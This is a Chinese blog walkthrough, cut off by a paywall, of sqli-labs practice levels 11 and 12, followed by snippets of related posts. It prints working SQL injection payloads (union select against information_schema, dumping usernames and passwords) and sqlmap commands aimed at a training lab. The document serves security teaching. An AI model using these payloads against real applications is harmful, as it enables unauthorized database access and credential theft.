【渗透测试】sqli-labs闯关(11-17)

已于 2022-07-27 08:30:06 修改
阅读量785 收藏 6
点赞数 2
分类专栏: 渗透测试 文章标签: 安全 sql
于 2020-04-21 19:03:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43168364/article/details/105650210
版权
本文详细介绍了sqli-labs的11至17关的渗透测试过程,涉及POST型的单引号、双引号加小括号的SQL注入点,以及无法使用联合查询时的XPath报错注入和延时注入方法,展示了不同闭合方式下的SQL注入攻击技巧。
摘要由CSDN通过智能技术生成

第十一关:POST型的单引号报错注入点

方法:联合查询
输入用户名密码,打开bp进行抓包。
在这里插入图片描述
将抓到的包发送到repeater模块
在这里插入图片描述
首先猜测注入点在用户名上,判断闭合的方式是单引号,还是其他的。用单引号闭合时回显正常。
在这里插入图片描述
用双引号闭合时没用,回显,可知是用单引号闭合的。
在这里插入图片描述
判断列数
在这里插入图片描述
在这里插入图片描述
可知有两列,接下来我们就可用联合查询了。判断联合查询的回显是否正常。
在这里插入图片描述
接下来得到表名,语法:dumb' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+.
在这里插入图片描述
然后爆出字段名,语法:dumb' and 1=2 union select 1,group(column_name) from information_schema.columns where table_schema=database() and table_name="users" --+
在这里插入图片描述
最后爆出详细的数据,语法:dumb' and 1=2 union select 1,group_concat(username,"-",password) from users --+
在这里插入图片描述

第十二关:POST型的双引号加小括号的注入点

方法:联合查询
登录进行抓包
在这里插入图片描述
注入点在用户名上,判断他的闭合方式
在这里插入图片描述
单引号没有回显,说明闭合的方式不是单引号,我们试试双引号,回显语法错误,根据之前的经验,我们判断这里可能有小括号.

最低0.47元/天 解锁文章
通地塔
关注
专栏目录
sqlmap过SQLi-LABS靶场 11-20关
小明师傅博客
06-05 3798
11关 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12关 一模一样 第13关 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14关 一模一样 15关 一模一样 16关-20关 都
从零开始的sqli-labs:十一关
asdushf的博客
12-12 764
sqli-labs第十一关 文章目录sqli-labs第十一关前言判断注入类型 前言 十一关开始出现登录框了 判断注入类型 这里注入类型的判断和前面差不太多,关键还是要注意引号的闭合。 上下两边都输入1,发现登录失败上边输入 ...
sqli-labs-----第11
wyzhxhn的博客
11-09 2001
基于错误的POST型单引号字符型注入
sqli-labs靶场通关攻略(11-15关)
最新发布
Nai_zui_jiang的博客
08-19 488
进入网页在输入框输入 1' 发现会有报错因为这里是POST方式提交的,不能直接修改,这里有三种选择1、使用可以POST提交的插件,例如Firefox中的HackBar2、使用Burpsuite抓包后,然后修改3、直接在输入框中注入咱们使用手工输入,会发现username和password会回显1,2那么我们就可以通过这里来查询他的数据库了输入下面这条语句查询出数据库名security查询表名查询user里所有的列最后查询表格的所有数据。
sqli-labs第十一关
小人物的博客
06-10 4429
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1448
sqli-labs基础篇 第11~17
渗透测试sqli-labs闯关(18-24)
qq_43168364的博客
08-22 943
第十八关:user-agent单引号字符型注入点 方法:在user-agent上进行xpath报错注入 这一关我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
sql-labs闯关32~37
qq_44663230的博客
09-04 2133
sql-labs闯关32~37 宽字节注入集合
渗透测试sqli-labs闯关(1-10)
qq_43168364的博客
04-20 572
第一关
SQL注入漏洞学习之二:SQLI-LABS闯关之Less-3和Less-4
m0_71839248的博客
06-10 759
SQLI-LABS闯关之Less-3和Less-4
sqli-labs11-22关闯关心得与思路
m0_48294281的博客
03-28 4104
sqli-labs11-22关闯关心得与思路
sqli-labs靶场第十一关
gou1791241251的博客
12-27 1367
进入页面后发现是登录框,所以可以尝试一下万能密码或账号,但是万能密码也是需要判断注入闭合方式的,所以与我们之前所做过的盲注是一样的。 由此页面可以看出闭合方式是单引号,所以我们可以使用布尔盲注来进行获取信息啦。。 此时看到显示结果太多了,多于1个,所以可以用limit 0,1来进行获取第一个信息 这里也是可以使用报错注入的哦。。 比如这个xpath报错注入 以下就不在展示信息获取的步骤啦 ...
sqli-labs 第十一关
weixin_67813445的博客
02-16 345
11关出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs第十一和十二关(post请求爆库)
qq_42266432的博客
08-23 625
第十一关开始,有输入框了,先往里面分别填入两个1看看 页面回显了"尝试登录失败"并且在上面url中并未发现路径后面有提交的参数,说明这不是get请求了,打开hackbar,loadURL发现是以表单方式提交的post请求(刚开始准备使用burp抓包来看请求,结果burp抓取不到本地包就很迷)到这里就可以尝试开始注入了 如上图,uname加上单引号,想要的东西就回显出来了 在将uname变为1’ or 1,上图这个sql报错可以猜出sql的条件目前是uname=‘1’ or 1’ and passwor
sql注入第11
qq_45751902的博客
03-14 4062
这关采用post的方式传参 定闭合符 使用’ or 1=1 # 回显正常 使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了) 实现原理 查询列数 ’ order by 2 # ’ order by 3 # 所以有两列 找显示位 查数据库名 'union select 1,database()# 查表名 ' union select 1,group_concat(table_name) from information_schema.tables where tab
sqli-labs第十一关、第十二关
qq_51366383的博客
12-07 455
从第十一关开始需要使用bp,我这里的都是用的repeater操作的。 判断闭合符 uname=admin’ --+&passwd=admin&submit=Submit 通过下面的对比可以看到这个是有回显出来的 uname=admin" --+&passwd=admin&submit=Submit 判断列数 uname=admin’ order by 2 --+&passwd=admin&submit=Submit 判断回显位 uname=admin’
sqli-labs(11-22关)
剁椒鱼头没剁椒的博客
10-10 1736
【代码】sqli-labs(11-22关)
superforming的sql-labs大通关之特殊关卡(十七关)解析及注入方法
五分之一世纪
02-08 538
superforming的sql-labs大通关 第一部分(第1~10关) 第二部分(第11~16关) 第三部分(特殊的17关) <1>特殊之处 (1)与之前关卡相比 1.在前十六关,sql-labs分别要用基于get数据传输方式的“联合查询”、“布尔盲注”、“时间盲注”、和基于post传输数据方式的“联合查询”、“布尔盲注”、“时间盲注”,而第十七关第一次用了“报错注入”。观察源码就会发现调用了“mysql_erroe函数”与“print_r函数”将报错信息输出,所可以进行"报错注入"。【如
sqli-labs-master前10关
07-28
回答: 在sqli-labs-master前10关中,可以使用不同的注入方法来获取数据库和表的信息。其中,联合查询、报错注入和sqlmap是常用的注入方法。联合查询可以通过判断注入点的类型、判断列数和使用order by语句来获取表名和字段名。报错注入可以通过使用extractvalue()函数来获取表名、字段名和字段的详细内容。而sqlmap是一款专门用于自动化注入的工具,可以通过指定参数和选项来获取数据库名、表名、字段名和字段的详细信息。在具体的关卡中,可以根据题目要求和注入点的特点选择合适的注入方法来解决问题。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [【渗透测试sqli-labs闯关(1-10)](https://blog.csdn.net/qq_43168364/article/details/105496598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs前十关记录](https://blog.csdn.net/qq_43277152/article/details/113388041)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs(1-10关)](https://blog.csdn.net/weixin_44268918/article/details/127181936)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值